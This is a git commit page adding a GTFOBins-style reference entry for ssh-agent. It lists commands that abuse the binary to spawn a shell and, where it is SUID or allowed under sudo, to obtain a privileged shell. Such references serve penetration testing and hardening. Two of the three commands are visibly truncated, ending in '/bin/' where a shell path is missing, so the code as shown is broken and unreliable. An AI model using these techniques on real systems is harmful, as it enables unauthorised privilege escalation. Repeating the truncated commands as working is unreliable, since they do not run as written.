Add ssh-agent

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
master
Emanuel Duss 2023-03-20 17:46:13 +01:00 committed by GitHub
parent 1121363e20
commit 15f69868f6
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 0 deletions

9
_gtfobins/ssh-agent.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: ssh-agent /bin/sh
suid:
- code: ./ssh-agent /bin/ -p
sudo:
- code: sudo ssh-agent /bin/
---